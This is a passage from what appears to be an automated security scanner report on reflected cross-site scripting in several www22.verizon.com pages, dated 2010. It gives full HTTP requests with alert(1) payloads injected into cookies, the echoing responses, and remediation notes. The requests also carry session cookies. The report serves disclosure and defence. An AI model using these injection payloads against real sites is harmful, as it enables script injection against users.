Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX721a5<script>alert(1)</script>92d3aad9a2c; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73632
Expires: Sat, 20 Nov 2010 02:53:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:53:55 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:55 GMT; path=/
Set-Cookie: ContextInfo_State=TX721a5<script>alert(1)</script>92d3aad9a2c; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:55 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:55 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:55 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX721A5<SCRIPT>ALERT(1)</SCRIPT>92D3AAD9A2C </DIV>
...[SNIP]...

3.300. https://www22.verizon.com/Residential/aboutFiOS/widgets/widgets.htm [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/aboutFiOS/widgets/widgets.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5e917'><script>alert(1)</script>680f4f478a3 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/widgets/widgets.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX5e917'><script>alert(1)</script>680f4f478a3; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73636
Expires: Sat, 20 Nov 2010 02:53:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:53:50 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:50 GMT; path=/
Set-Cookie: ContextInfo_State=TX5e917'><script>alert(1)</script>680f4f478a3; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:50 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:50 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:50 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX5E917'><SCRIPT>ALERT(1)</SCRIPT>680F4F478A3 ' />
...[SNIP]...

3.301. https://www22.verizon.com/Residential/aboutFiOS/widgets/widgets.htm [dotcomsid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/aboutFiOS/widgets/widgets.htm

Issue detail

The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9c96"-alert(1)-"386419827f6 was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Residential/aboutFiOS/widgets/widgets.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=d9c96"-alert(1)-"386419827f6; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 77874
Expires: Sat, 20 Nov 2010 02:53:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:53:45 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:45 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:45 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:45 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:45 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<script type="text/javascript">
function startmenu()
{
}
var mvzOptIn="N";
var strdotcomval = "d9c96"-alert(1)-"386419827f6"
if(mvzOptIn != 'Y' || strdotcomval == "")
{
    var m_view = new VZT.MasterNavView();
    var m_model = {container: document.getElementB
...[SNIP]...

3.302. https://www22.verizon.com/content/verizonglobalhome/gpromo.aspx [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /content/verizonglobalhome/gpromo.aspx

Issue detail

The value of the vzapps cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ae0f'-alert(1)-'8c7ffab235 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/verizonglobalhome/gpromo.aspx?a=1290217502286&state=TX HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: https://www22.verizon.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-sf=false; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vzAppID=; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; V347=CT-2; LOB_CATEGORY=; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; Product=A; ProductXML=A; vzpers=STATE=TX; CP=null*; canigetfios=Y; showpromo=Y; BusinessUnit=residential; refURL=https://www22.verizon.com/; vzapps=STATE=TX8ae0f'-alert(1)-'8c7ffab235

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 13077
Expires: Sat, 20 Nov 2010 01:55:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 01:55:03 GMT
Connection: keep-alive

   
<div class="marquee_selector_bubble sprite sprite_marquee_bubble"></div>
                        <table class="marquee_selectors"><tr><td>
                       
                        <UL><LI><A class="marquee_selector
...[SNIP]...
<script>if(document.getElementById('yourlocation')) document.getElementById('yourlocation').innerHTML = 'TX8ae0f'-alert(1)-'8c7ffab235 ';</script>
...[SNIP]...

3.303. https://www22.verizon.com/foryourhome/fttprepair/nr/common/MainMenu.aspx [ECSPCookies cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /foryourhome/fttprepair/nr/common/MainMenu.aspx

Issue detail

The value of the ECSPCookies cookie is copied into the HTML document as plain text between tags. The payload 4d80b<script>alert(1)</script>dfd32d9c68b was submitted in the ECSPCookies cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /foryourhome/fttprepair/nr/common/MainMenu.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=4d80b<script>alert(1)</script>dfd32d9c68b; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; 